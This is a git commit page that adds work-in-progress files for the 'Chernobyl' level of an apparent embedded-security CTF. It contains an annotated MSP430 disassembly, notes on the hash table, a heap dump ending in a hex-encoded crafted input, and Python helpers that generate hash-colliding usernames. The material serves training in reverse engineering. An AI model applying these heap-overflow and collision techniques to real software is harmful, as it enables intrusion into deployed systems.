felixm/microcorruption
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add Chernobyl work in progress files.

Browse Source
This commit is contained in:
felixm 2023-09-02 22:38:28 -04:00
parent e139538d7e
commit 23dc19fa30
6 changed files with 1039 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
__pycache__

844
chernobyl/chernobyl_listing.txt Normal file
View File

@ -0,0 +1,844 @@
0010 <__trap_interrupt>
0010: ret
4400 <__init_stack>
4400: mov #0x4400, sp
4404 <__low_level_init>
4404: mov &0x015c, r5
4408: and.b #-0x1, r5
440a: bis #0x5a08, r5
440e <__do_copy_data>
440e: mov #0x6, r15
4412: tst r15
4414: jz $4424
4416: mov r5, &0x015c
441a: decd r15
441c: mov 0x4d9e(r15), 0x2400(r15)
4422: jnz $4416
4424 <__do_clear_bss>
4424: clr r15
4428: tst r15
442a: jz $4438
442c: mov r5, &0x015c
4430: dec r15
4432: mov.b #0x0, 0x2406(r15)
4436: jnz $442c
4438 <main>
4438: sub #0x8, sp
443a: call $4b66 <run>
443e <__stop_progExec__>
443e: bis #0xf0, sr
4442: jmp $443e
4444 <__ctors_end>
4444: br #0x4d9c <_unexpected_>
4448 <printf>
4448: push r11
444a: push r10
444c: push r9
444e: push r8
4450: push r7
4452: push r6
4454: push r4
4456: mov sp, r4
4458: add #0xe, r4
445c: decd sp
445e: mov 0x2(r4), r11
4462: mov sp, -0x10(r4)
4466: mov r11, r15
4468: clr r14
446a: jmp $4482
446c: inc r15
446e: cmp.b #0x25, r13
4472: jnz $4482
4474: cmp.b @r15, r13
4476: jnz $447e
4478: inc r15
447a: clr r13
447c: jmp $4480
447e: mov #0x1, r13
4480: add r13, r14
4482: mov.b @r15, r13
4484: tst.b r13
4486: jnz $446c
4488: mov r14, r15
448a: add r15, r15
448c: incd r15
448e: sub r15, sp
4490: mov sp, r9
4492: mov r4, r12
4494: add #0x4, r12
4496: mov sp, r15
4498: clr r13
449a: jmp $44a6
449c: mov @r12, 0x0(r15)
44a0: inc r13
44a2: incd r15
44a4: incd r12
44a6: cmp r14, r13
44a8: jl $449c
44aa: clr r10
44ac: mov #0x9, r6
44b0: jmp $454a
44b2: mov r11, r8
44b4: inc r8
44b6: cmp.b #0x25, r15
44ba: jz $44c8
44bc: inc r10
44be: mov r8, r11
44c0: sxt r15
44c2: call $4d04 <putchar>
44c6: jmp $454a
44c8: mov.b @r8, r14
44ca: cmp.b r15, r14
44cc: jnz $44da
44ce: inc r10
44d0: mov #0x25, r15
44d4: call $4d04 <putchar>
44d8: jmp $4544
44da: cmp.b #0x73, r14
44de: jnz $44f6
44e0: mov @r9, r11
44e2: jmp $44ee
44e4: inc r10
44e6: inc r11
44e8: sxt r15
44ea: call $4d04 <putchar>
44ee: mov.b @r11, r15
44f0: tst.b r15
44f2: jnz $44e4
44f4: jmp $4544
44f6: cmp.b #0x78, r14
44fa: jnz $4538
44fc: mov @r9, r11
44fe: mov #0x4, r7
4500: jmp $452e
4502: mov r11, r15
4504: swpb r15
4506: and #0xff, r15
450a: clrc
450c: rrc r15
450e: rra r15
4510: rra r15
4512: rra r15
4514: cmp r15, r6
4516: jl $451e
4518: add #0x30, r15
451c: jmp $4522
451e: add #0x57, r15
4522: call $4d04 <putchar>
4526: add r11, r11
4528: add r11, r11
452a: add r11, r11
452c: add r11, r11
452e: add #-0x1, r7
4530: cmp #-0x1, r7
4532: jnz $4502
4534: add #0x4, r10
4536: jmp $4544
4538: cmp.b #0x6e, r14
453c: jnz $4544
453e: mov @r9, r15
4540: mov r10, 0x0(r15)
4544: incd r9
4546: mov r8, r11
4548: inc r11
454a: mov.b @r11, r15
454c: tst.b r15
454e: jnz $44b2
4550: mov -0x10(r4), sp
4554: incd sp
4556: pop r4
4558: pop r6
455a: pop r7
455c: pop r8
455e: pop r9
4560: pop r10
4562: pop r11
4564: ret
45ba <walk>
45ba: push r11
45bc: push r10
45be: push r9
45c0: mov r15, r11
45c2: mov #0x4566, r15
45c6: call $4d50 <puts>
45ca: mov 0x4(r11), r15
45ce: mov r15, r14
45d0: and #0x1, r14
45d2: clrc
45d4: rrc r15
45d6: tst r14
45d8: jz $4636
45da: push r15
45dc: push 0x2(r11)
45e0: push @r11
45e2: push r11
45e4: push #0x4569
45e8: call $4448 <printf>
45ec: add #0xa, sp
45f0: mov r11, r10
45f2: add #0x6, r10
45f6: push r10
45f8: push #0x458b
45fc: call $4448 <printf>
4600: add #0x4, sp
4602: clr r9
4604: jmp $4616
4606: push @r10
4608: push #0x4594
460c: call $4448 <printf>
4610: add #0x4, sp
4612: inc r9
4614: incd r10
4616: mov 0x4(r11), r15
461a: clrc
461c: rrc r15
461e: rra r15
4620: cmp r15, r9
4622: jnc $4606
4624: mov #0x5d, r15
4628: call $4d04 <putchar>
462c: mov #0xa, r15
4630: call $4d04 <putchar>
4634: jmp $464c
4636: push r15
4638: push 0x2(r11)
463c: push @r11
463e: push r11
4640: push #0x4598
4644: call $4448 <printf>
4648: add #0xa, sp
464c: mov 0x2(r11), r11
4650: cmp &0x2400, r11
4654: jnz $45ca
4656: pop r9
4658: pop r10
465a: pop r11
465c: ret
465e: addc.b r5, r8
4660: subc.b @pc, sp
4662: addc @r5, pc
4664: addc.b @sp+, r8
4666: subc.b #-0x1, r5
4668: addc.b @r5+, r4
466a: jl $4534
466c: addc @sp, pc
466e: addc.b @r15, sr
4670: subc.b @r4+, sr
4672: addc.b @r14, r9
4674: jc $4344
4678 <malloc>
4678: push r11
467a: tst.b &0x2404
467e: jz $469e
4680: mov &0x2400, r14
4684: mov r14, 0x0(r14)
4688: mov r14, 0x2(r14)
468c: mov &0x2402, r13
4690: add #0xfffa, r13
4694: add r13, r13
4696: mov r13, 0x4(r14)
469a: mov.b #0x0, &0x2404
469e: mov &0x2400, r11
46a2: mov r11, r14
46a4: mov 0x4(r14), r13
46a8: bit #0x1, r13
46aa: jnz $46fc
46ac: mov r13, r12
46ae: clrc
46b0: rrc r12
46b2: cmp r15, r12
46b4: jl $46fc
46b6: mov r15, r11
46b8: add #0x6, r11
46bc: cmp r11, r12
46be: jc $46c8
46c0: bis #0x1, r13
46c2: mov r13, 0x4(r14)
46c6: jmp $46f4
46c8: mov r15, r13
46ca: add r13, r13
46cc: bis #0x1, r13
46ce: mov r13, 0x4(r14)
46d2: mov r14, r13
46d4: add #0x6, r13
46d8: add r15, r13
46da: mov r14, 0x0(r13)
46de: mov 0x2(r14), 0x2(r13)
46e4: sub r15, r12
46e6: add #0xfffa, r12
46ea: add r12, r12
46ec: mov r12, 0x4(r13)
46f0: mov r13, 0x2(r14)
46f4: mov r14, r15
46f6: add #0x6, r15
46fa: jmp $4718
46fc: mov r14, r13
46fe: mov 0x2(r14), r14
4702: cmp r13, r14
4704: jnc $470a
4706: cmp r11, r14
4708: jnz $46a4
470a: mov #0x465e, r15
470e: call $4d50 <puts>
4712: br #0x443e <__stop_progExec__>
4716: clr r15
4718: pop r11
471a: ret
471c <free>
471c: push r11
471e: add #0xfffa, r15
4722: mov 0x4(r15), r13
4726: and #0xfffe, r13
472a: mov r13, 0x4(r15)
472e: mov @r15, r14
4730: mov 0x4(r14), r12
4734: bit #0x1, r12
4736: jnz $4752
4738: add #0x6, r12
473c: add r13, r12
473e: mov r12, 0x4(r14)
4742: mov 0x2(r15), 0x2(r14)
4748: mov 0x2(r15), r13
474c: mov r14, 0x0(r13)
4750: mov @r15, r15
4752: mov 0x2(r15), r14
4756: mov 0x4(r14), r13
475a: bit #0x1, r13
475c: jnz $4774
475e: add 0x4(r15), r13
4762: add #0x6, r13
4766: mov r13, 0x4(r15)
476a: mov 0x2(r14), 0x2(r15)
4770: mov r15, 0x0(r14)
4774: pop r11
4776: ret
4778 <create_hash_table>
4778: push r11
477a: push r10
477c: push r9
477e: push r8
4780: push r7
4782: push r6
4784: mov r15, r7
4786: mov r14, r9
4788: mov #0xa, r15
478c: call $4678 <malloc>
4790: mov r15, r10
4792: clr 0x0(r15)
4796: mov r7, 0x2(r15)
479a: mov r9, 0x4(r15)
479e: mov #0x2, r11
47a0: mov r7, r15
47a2: tst r15
47a4: jz $47ac
47a6: add r11, r11
47a8: dec r15
47aa: jnz $47a6
47ac: mov r11, r15
47ae: call $4678 <malloc>
47b2: mov r15, 0x6(r10)
47b6: mov r11, r15
47b8: call $4678 <malloc>
47bc: mov r15, 0x8(r10)
47c0: mov #0x1, r8
47c2: tst r7
47c4: jz $47cc
47c6: add r8, r8
47c8: dec r7
47ca: jnz $47c6
47cc: mov r9, r11
47ce: add r11, r11
47d0: add r11, r11
47d2: add r11, r11
47d4: add r9, r11
47d6: add r11, r11
47d8: clr r9
47da: jmp $47fa
47dc: mov r9, r7
47de: add r7, r7
47e0: mov 0x6(r10), r6
47e4: add r7, r6
47e6: mov r11, r15
47e8: call $4678 <malloc>
47ec: mov r15, 0x0(r6)
47f0: add 0x8(r10), r7
47f4: clr 0x0(r7)
47f8: inc r9
47fa: cmp r8, r9
47fc: jl $47dc
47fe: mov r10, r15
4800: pop r6
4802: pop r7
4804: pop r8
4806: pop r9
4808: pop r10
480a: pop r11
480c: ret
480e <hash> ; r15=pName -> r15
480e: mov r15, r14 ; hashes string in r15
4810: clr r15 ; and returns hash in r15
4812: jmp $482a
4814: mov.b @r14, r13
4816: sxt r13
4818: add r15, r13
481a: mov r13, r15
481c: add r15, r15
481e: add r15, r15
4820: add r15, r15
4822: add r15, r15
4824: add r15, r15
4826: sub r13, r15
4828: inc r14
482a: tst.b 0x0(r14)
482e: jnz $4814
4830: ret
4832 <add_to_table> r15_hash_table_root, 14_p_user_name, r13_hashed_pin
4832: push r11
4834: push r10
4836: push r9
4838: mov r15, r11 ; r11_hash_table_root
483a: mov r14, r10 ; r10_p_user_name
483c: mov r13, r9 ; r9_hashed_pin
483e: mov 0x2(r15), r14 ; r14_hash_table+2 (3?)
4842: mov 0x4(r15), r12 ; r12_hash_table+4 (5?)
4846: mov r14, r15 ; r15_hash_table+2 (3?)
4848: tst r15
484a: jz $4852
484c: add r12, r12 ; r12 += r12
484e: dec r15 ; r15--
4850: jnz $484c ; r12_hash_table+2 *= (2**hash_table+4) (20?)
4852: tst r12
4854: jge $485a
4856: add #0x3, r12
485a: rra r12
485c: rra r12
485e: cmp @r11, r12
4860: jge $486a
4862: inc r14
4864: mov r11, r15
4866: call $48d4 <rehash>
486a: inc 0x0(r11)
486e: mov r10, r15
4870: call $480e <hash>
4874: mov #0x1, r12
4876: mov 0x2(r11), r14
487a: tst r14
487c: jz $4884
487e: add r12, r12
4880: dec r14
4882: jnz $487e
4884: add #-0x1, r12
4886: and r15, r12
4888: add r12, r12
488a: mov 0x8(r11), r15
488e: add r12, r15
4890: mov @r15, r14
4892: mov 0x6(r11), r11
4896: add r12, r11
4898: mov r14, r12
489a: add r12, r12
489c: add r12, r12
489e: add r12, r12
48a0: add r14, r12
48a2: add r12, r12
48a4: add @r11, r12
48a6: inc r14
48a8: mov r14, 0x0(r15)
48ac: clr r15
48ae: jmp $48c2
48b0: mov r12, r11
48b2: add r15, r11
48b4: mov.b r14, 0x0(r11)
48b8: inc r15
48ba: cmp #0xf, r15
48be: jz $48c8
48c0: inc r10
48c2: mov.b @r10, r14
48c4: tst.b r14
48c6: jnz $48b0
48c8: mov r9, 0x10(r12)
48cc: pop r9
48ce: pop r10
48d0: pop r11
48d2: ret
48d4 <rehash>
48d4: push r11
48d6: push r10
48d8: push r9
48da: push r8
48dc: push r7
48de: push r6
48e0: push r5
48e2: push r4
48e4: decd sp
48e6: mov r15, r11
48e8: mov 0x2(r15), r6
48ec: mov 0x6(r15), r5
48f0: mov 0x8(r15), r4
48f4: mov r14, 0x2(r15)
48f8: clr 0x0(r15)
48fc: mov #0x2, r10
48fe: tst r14
4900: jz $4908
4902: add r10, r10
4904: dec r14
4906: jnz $4902
4908: mov r10, r15
490a: call $4678 <malloc>
490e: mov r15, 0x6(r11)
4912: mov r10, r15
4914: call $4678 <malloc>
4918: mov r15, 0x8(r11)
491c: clr r10
491e: mov #0x1, r8
4920: jmp $4950
4922: mov r10, r9
4924: add r9, r9
4926: mov 0x6(r11), r7
492a: add r9, r7
492c: mov 0x4(r11), r15
4930: mov r15, r14
4932: add r14, r14
4934: add r14, r14
4936: add r14, r14
4938: add r15, r14
493a: mov r14, r15
493c: add r15, r15
493e: call $4678 <malloc>
4942: mov r15, 0x0(r7)
4946: add 0x8(r11), r9
494a: clr 0x0(r9)
494e: inc r10
4950: mov 0x2(r11), r13
4954: mov r8, r14
4956: tst r13
4958: jz $4960
495a: add r14, r14
495c: dec r13
495e: jnz $495a
4960: cmp r14, r10
4962: jl $4922
4964: mov r6, r15
4966: mov #0x1, r14
4968: tst r15
496a: jz $4972
496c: add r14, r14
496e: dec r15
4970: jnz $496c
4972: mov r14, 0x0(sp)
4976: mov r5, r10
4978: mov r4, r9
497a: clr r7
497c: jmp $49a8
497e: mov @r10, r14
4980: add r8, r14
4982: mov 0x10(r14), r13
4986: mov r11, r15
4988: call $4832 <add_to_table>
498c: inc r6
498e: add #0x12, r8
4992: jmp $4998
4994: clr r8
4996: mov r8, r6
4998: cmp @r9, r6
499a: jl $497e
499c: mov @r10, r15
499e: call $471c <free>
49a2: inc r7
49a4: incd r10
49a6: incd r9
49a8: cmp @sp, r7
49aa: jl $4994
49ac: mov r4, r15
49ae: call $471c <free>
49b2: mov r5, r15
49b4: call $471c <free>
49b8: incd sp
49ba: pop r4
49bc: pop r5
49be: pop r6
49c0: pop r7
49c2: pop r8
49c4: pop r9
49c6: pop r10
49c8: pop r11
49ca: ret
49cc <get_from_table> r13=hashedPin, r14=pName, r15=pHashTableRoot
49cc: push r11
49ce: push r10
49d0: push r9
49d2: push r8
49d4: push r7
49d6: push r6
49d8: mov r15, r10 ; r10=pHashTableRoot
49da: mov r14, r6 ; r6=pName
49dc: mov r14, r15 ; r15=pName
49de: call $480e <hash> ; (r15=pName); r15=hashedName
49e2: mov #0x1, r11 ; r11=1
49e4: mov 0x2(r10), r13 ; r13=? *(pHashTableRoot + 2)
49e8: tst r13 ; [r11 = 2**r13]
49ea: jz $49f2 ; jump if r13 == 0
49ec: add r11, r11 ; r11 *= 2
49ee: dec r13 ; r13--
49f0: jnz $49ec ; while r13 != 0
49f2: add #-0x1, r11 ; r11--
49f4: and r15, r11 ; r11 &= r15
49f6: add r11, r11 ; r11 *= 2
49f8: mov 0x6(r10), r13 ; r13=? *(pHashTableRoot + 6)
49fc: add r11, r13 ; r13 += r11
49fe: mov @r13, r9 ; r9 = (first element?)
4a00: clr r8 ;
4a02: jmp $4a1e ;
4a04: mov r9, r7
4a06: mov r9, r14
4a08: mov r6, r15
4a0a: call $4d7c <strcmp>
4a0e: add #0x12, r9
4a12: tst r15
4a14: jnz $4a1c
4a16: mov 0x10(r7), r15
4a1a: jmp $4a2a
4a1c: inc r8
4a1e: mov 0x8(r10), r15 ; r15=? *(pHashTableRoot + 8)
4a22: add r11, r15 ;
4a24: cmp @r15, r8 ;
4a26: jl $4a04 ; jump if @r15 is negative
4a28: mov #-0x1, r15
4a2a: pop r6
4a2c: pop r7
4a2e: pop r8
4a30: pop r9
4a32: pop r10
4a34: pop r11
4a36: ret
4b66 <run>
4b66: push r11
4b68: push r10
4b6a: push r9
4b6c: push r8
4b6e: push r7
4b70: add #0xfa00, sp
4b74: mov #0x5, r14
4b78: mov #0x3, r15
4b7c: call $4778 <create_hash_table>;
4b80: mov r15, r8 ; r8=pHashTableRoot
4b82: mov #0x4a38, r15 ; output stuff
4b86: call $4d50 <puts>
4b8a: mov #0x4a58, r15
4b8e: call $4d50 <puts>
4b92: mov #0x4a95, r15
4b96: call $4d50 <puts> ; till here
4b9a: clr r14
4b9c: mov #0x5ff, r7 ; zero 0x5ff bytes from sp up
4ba0: jmp $4bac
4ba2: mov sp, r15
4ba4: add r14, r15
4ba6: mov.b #0x0, 0x0(r15)
4baa: inc r14
4bac: cmp r14, r7
4bae: jge $4ba2
4bb0: mov #0x550, r14 ; getsn number of chars
4bb4: mov sp, r15 ; getsn pointer
4bb6: call $4d40 <getsn> ; read up to 0x550 bytes into sp
4bba: mov sp, r11 ; r11=pInputData
4bbc: jmp $4ce2
4bbe: cmp.b #0x61, r15 ; cmp first byte to 'a'
4bc2: jnz $4c38 ; jump if not 'a'
4bc4: mov r11, r14 ; load input pointer into r14 and skip 7 chars
4bc6: add #0x7, r14 ; r14=pName
4bca: mov r14, r11 ; r11=pName
4bcc: jmp $4bdc ; read characters till space
4bce: cmp.b #0x20, r15 ; is character a space?
4bd2: jnz $4bda ; jump if not a space
4bd4: mov.b #0x0, 0x0(r11) ; move a zero on space
4bd8: jmp $4be2
4bda: inc r11
4bdc: mov.b @r11, r15 ; load current input char
4bde: tst.b r15 ; test current char is zero
4be0: jnz $4bce ; jump if not zero
4be2: inc r11 ; increment r11 to next input char after space
4be4: clr r10
4be6: jmp $4bfe
4be8: mov r10, r13 ; r13=hashedPin
4bea: add r13, r13
4bec: add r13, r13
4bee: add r10, r13
4bf0: add r13, r13
4bf2: mov.b @r11, r10
4bf4: sxt r10
4bf6: add #0xffd0, r10
4bfa: add r13, r10 ; final result of hasing will be in r13
4bfc: inc r11
4bfe: mov.b @r11, r15 ; load next char after space 'access foo V'
4c00: tst.b r15 ;
4c02: jz $4c0a ; jump if char is zero
4c04: cmp.b #0x3b, r15 ; cmp byte to ';'
4c08: jnz $4be8 ; jump if not a ';'
4c0a: mov r8, r15 ; r15=pHashTableRoot
4c0c: call $49cc <get_from_table> ; (r13=hashedPin, r14=pName, r15=pHashTableRoot)
4c10: cmp #-0x1, r15
4c12: jnz $4c1a
4c14: mov #0x4a96, r15 ; load 'no such box' into r15
4c18: jmp $4c9c ;
4c1a: xor r15, r10
4c1c: and #0x7fff, r10
4c20: jnz $4c32
4c22: cmp r10, r15
4c24: jge $4c2c
4c26: mov #0x4aa3, r15 ; load 'access granted'
4c2a: jmp $4c9c
4c2c: mov #0x4ab3, r15 ; load 'access granted; but account not activated'
4c30: jmp $4c9c
4c32: mov #0x4ade, r15 ; load 'access denied'
4c36: jmp $4c9c
4c38: cmp.b #0x6e, r15 ; cmp first byte to 'n'
4c3c: jnz $4cbe ; jump if not 'n'
4c3e: mov r11, r9 ; r9=pInputData
4c40: add #0x4, r9 ; r9+=4=pName
4c42: mov r9, r11 ; r11=pName
4c44: jmp $4c54
4c46: cmp.b #0x20, r15 ; is *pName <space>
4c4a: jnz $4c52 ;
4c4c: mov.b #0x0, 0x0(r11) ; *pName == ' ' -> *pName = 0
4c50: jmp $4c5a
4c52: inc r11 ; *pname != ' ' -> pName++
4c54: mov.b @r11, r15 ; r15=*pName
4c56: tst.b r15
4c58: jnz $4c46 ; jump if *pName is not zero
4c5a: inc r11 ; pName++; r11=pPin
4c5c: clr r10
4c5e: jmp $4c76
4c60: mov r10, r12 ; r12=hashedPin
4c62: add r12, r12
4c64: add r12, r12
4c66: add r10, r12
4c68: add r12, r12
4c6a: mov.b @r11, r10
4c6c: sxt r10
4c6e: add #0xffd0, r10
4c72: add r12, r10
4c74: inc r11
4c76: mov.b @r11, r15
4c78: tst.b r15 ;
4c7a: jz $4c82 ; *pPin == 0
4c7c: cmp.b #0x3b, r15 ;
4c80: jnz $4c60 ; *pPin != ';'
4c82: tst r10
4c84: jge $4c8c
4c86: mov #0x4aec, r15 ; load 'Can not have a pin with high bit set'
4c8a: jmp $4c9c ; done
4c8c: mov r9, r14 ; p14=pInputData
4c8e: mov r8, r15 ; p15=pHashTableRoot
4c90: call $49cc <get_from_table>
4c94: cmp #-0x1, r15
4c96: jz $4ca2
4c98: mov #0x4b12, r15 ; load 'User already has an account'
4c9c: call $4d50 <puts>
4ca0: jmp $4cda
4ca2: push r10
4ca4: push r9
4ca6: push #0x4b2f ; push 'Adding user account %s with pin %x'
4caa: call $4448 <printf>
4cae: add #0x6, sp
4cb2: mov r10, r13
4cb4: mov r9, r14
4cb6: mov r8, r15
4cb8: call $4832 <add_to_table>
4cbc: jmp $4cda
4cbe: mov #0x4b54, r15 ; load 'Invalid command'
4cc2: call $4d50 <puts> ; output invalid command and return
4cc6: mov #0x1, r15
4cc8: add #0x600, sp
4ccc: pop r7
4cce: pop r8
4cd0: pop r9
4cd2: pop r10
4cd4: pop r11
4cd6: ret
4cd8: inc r11
4cda: cmp.b #0x3b, 0x0(r11) ; When 'User already has an account' or 'Adding user account'
4ce0: jz $4cd8 ; probably we want to use that somehow?
4ce2: mov.b @r11, r15
4ce4: tst.b r15
4ce6: jnz $4bbe
4ce8: clr r14
4cea: jmp $4bac
4cec <INT>
4cec: 1e41 0200 mov 0x2(sp), r14
4cf0: 0212 push sr
4cf2: 0f4e mov r14, r15
4cf4: 8f10 swpb r15
4cf6: 024f mov r15, sr
4cf8: 32d0 0080 bis #0x8000, sr
4cfc: b012 1000 call $0010
4d00: 3241 pop sr
4d02: 3041 ret
4d04 <putchar>
4d04: 2183 decd sp
4d06: 0f12 push r15
4d08: 0312 push #0x0
4d0a: 814f 0400 mov r15, 0x4(sp)
4d0e: b012 ec4c call $4cec <INT>
4d12: 1f41 0400 mov 0x4(sp), r15
4d16: 3150 0600 add #0x6, sp
4d1a: 3041 ret
4d1c <getchar>
4d1c: 0412 push r4
4d1e: 0441 mov sp, r4
4d20: 2453 incd r4
4d22: 2183 decd sp
4d24: 3f40 fcff mov #0xfffc, r15
4d28: 0f54 add r4, r15
4d2a: 0f12 push r15
4d2c: 1312 push #0x1
4d2e: b012 ec4c call $4cec <INT>
4d32: 5f44 fcff mov.b -0x4(r4), r15
4d36: 8f11 sxt r15
4d38: 3150 0600 add #0x6, sp
4d3c: 3441 pop r4
4d3e: 3041 ret
4d40 <getsn>
4d40: 0e12 push r14
4d42: 0f12 push r15
4d44: 2312 push #0x2
4d46: b012 ec4c call $4cec <INT>
4d4a: 3150 0600 add #0x6, sp
4d4e: 3041 ret
4d50 <puts>
4d50: 0b12 push r11
4d52: 0b4f mov r15, r11
4d54: 073c jmp $4d64
4d56: 1b53 inc r11
4d58: 8f11 sxt r15
4d5a: 0f12 push r15
4d5c: 0312 push #0x0
4d5e: b012 ec4c call $4cec <INT>
4d62: 2152 add #0x4, sp
4d64: 6f4b mov.b @r11, r15
4d66: 4f93 tst.b r15
4d68: f623 jnz $4d56
4d6a: 3012 0a00 push #0xa
4d6e: 0312 push #0x0
4d70: b012 ec4c call $4cec <INT>
4d74: 2152 add #0x4, sp
4d76: 0f43 clr r15
4d78: 3b41 pop r11
4d7a: 3041 ret
4d7c <strcmp>
4d7c: 033c jmp $4d84
4d7e: 4d93 tst.b r13
4d80: 0b24 jz $4d98
4d82: 1f53 inc r15
4d84: 6d4f mov.b @r15, r13
4d86: 6c4e mov.b @r14, r12
4d88: 1e53 inc r14
4d8a: 4d9c cmp.b r12, r13
4d8c: f827 jz $4d7e
4d8e: 4f4d mov.b r13, r15
4d90: 5e4e ffff mov.b -0x1(r14), r14
4d94: 0f8e sub r14, r15
4d96: 3041 ret
4d98: 0f43 clr r15
4d9a: 3041 ret
4d9c <_unexpected_>
4d9c: 0013 reti pc

21
chernobyl/misc.txt Normal file
View File

@ -0,0 +1,21 @@
You can add multiple commands by delimiting with ; and without a space after:
new ibio 1337;new xnjc 1337;new folm 1337;
Command to print tree:
#define walk pc=45ba; r15=5000; b 465c; continue
Q and A:
1: Figure out what 3 and 5 parameters are for.
- The 5 stands for the entries per sub-table.
- The 3 stands for the log2 number of sub-tables
2: Find out what rehash trigger depends on.
Rehash is triggered when a sub table is full (when I use aaaa, bbbb, cccc as
usernames these result in the same hash and fill up the table).
3:

51
chernobyl/replace_relative_addresses.py Normal file
View File

@ -0,0 +1,51 @@
import sys
import re
JUMP_INSTRUCTIONS = [
"jc",
"jhs",
"jeq",
"jz",
"jge",
"jlt",
"jmp",
"jn",
"jnc",
"jlo",
"jl",
"jne",
"jnz",
]
def make_jump_line_absolute(line: str, parts: list[str]) -> str:
line_addr = int(parts[0].replace(":", ""), 16)
addr_offset = int(parts[3].replace("$", ""), 16)
abs_target_addr = line_addr + addr_offset
line = line.replace(parts[4], '') # remove relative to functione addr
line = line.replace(parts[3], f'${hex(abs_target_addr)[2:]}') # replace relative with abs addr
return line
def replace_relative_addresses(file_name: str) -> None:
with open(file_name, 'r') as f:
lines = f.readlines()
for i in range(len(lines)):
line = lines[i]
parts = re.split(r'\s+', line.strip())
if len(parts) == 5 and parts[2] in JUMP_INSTRUCTIONS:
line = make_jump_line_absolute(line, parts)
lines[i] = line
if 'call' in line:
lines[i] = line.replace('#0x', '$')
with open(file_name.replace('.asm', '_with_abs_addr.txt'), 'w') as f:
f.writelines(lines)
if __name__ == "__main__":
file_name = sys.argv[1]
replace_relative_addresses(file_name)

37
chernobyl/tree.txt Normal file
View File

@ -0,0 +1,37 @@
The following is a hash tree with the root address at 0x5006.
@5000 [alloc] [p 5000] [n 5010] [s 000a]
{5006} [ 0005 ; current entries
0003 ; heap size log2, i.e. for 3 there are 8 tables, for 4 there are 16 tables and so on
0005 ; max entries per table
5016 ; pointer to array of tables
502c ; pointer to array of curren entries for that table
]
@5010 [alloc] [p 5000] [n 5026] [s 0010]
{5016} [ 5042 50a2 5102 5162 51c2 5222 5282 52e2 ]
@5026 [alloc] [p 5010] [n 503c] [s 0010]
{502c} [ 0005 0000 0000 0000 0000 0000 0000 0000 ]
@503c [alloc] [p 5026] [n 509c] [s 005a]
{5042} [ 6161 6161 0000 0000 0000 0000 0000 0000 0539 6262 6262 0000 0000 0000 0000 0000 0000 0539 6363 6363 0000 0000 0000 0000 0000 0000 0539 6464 6464 0000 0000 0000 0000 0000 0000 0539 6565 6565 0000 0000 0000 0000 0000 0000 0539 ]
@509c [alloc] [p 503c] [n 50fc] [s 005a]
{50a2} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@50fc [alloc] [p 509c] [n 515c] [s 005a]
{5102} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@515c [alloc] [p 50fc] [n 51bc] [s 005a]
{5162} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@51bc [alloc] [p 515c] [n 521c] [s 005a]
{51c2} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@521c [alloc] [p 51bc] [n 527c] [s 005a]
{5222} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@527c [alloc] [p 521c] [n 52dc] [s 005a]
{5282} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@52dc [alloc] [p 527c] [n 533c] [s 005a]
{52e2} [ 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ]
@533c [freed] [p 52dc] [n 5000] [s 7cbe]
new
\
------ ----
6e6577203c5044407cf920313333373b
------------

85
chernobyl/utils.py Normal file
View File

@ -0,0 +1,85 @@
import random
import string
def hash_user(user: str) -> str:
r15 = 0
for i in range(len(user)):
r13 = ord(user[i])
r13 = (r13 + r15) & 0xffff
r15 = r13
r15 = (r15 + r15) & 0xffff
r15 = (r15 + r15) & 0xffff
r15 = (r15 + r15) & 0xffff
r15 = (r15 + r15) & 0xffff
r15 = (r15 + r15) & 0xffff
r15 = (r15 - r13) & 0xffff
return f"{r15:0{4}x}"
def user_to_hash_table_index(user: str) -> str:
hash = int(hash_user(user), 16)
hash &= 0x07
return f"{hash:0{4}x}"
def hash_pin(pin: str) -> str:
r10 = 0
r12 = r10
for i in range(len(pin)):
r12 = r10
r12 = (r12 + r12) & 0xffff
r12 = (r12 + r12) & 0xffff
r12 = (r10 + r12) & 0xffff
r12 = (r12 + r12) & 0xffff
r10 = ord(pin[i])
r10 = (r10 + 0xffd0) & 0xffff
r10 = (r10 + r12) & 0xffff
# print(hex(r10), hex(r12), pin[i])
return f"{r10:0{4}x}"
def find_users_that_hash(number_users: int, hash_index: int):
strings = []
while len(strings) < number_users:
user = generate_random_string(4)
index = user_to_hash_table_index(user)
if index == f"000{hash_index}":
s = f"new {user} 1337;"
strings.append(s)
r = "".join(strings)
return r
def transform_ascii_to_bytes(input_str: str) -> str:
bytes_array = bytes(input_str, 'utf-8')
return bytes_array.hex()
def generate_random_string(n: int) -> str:
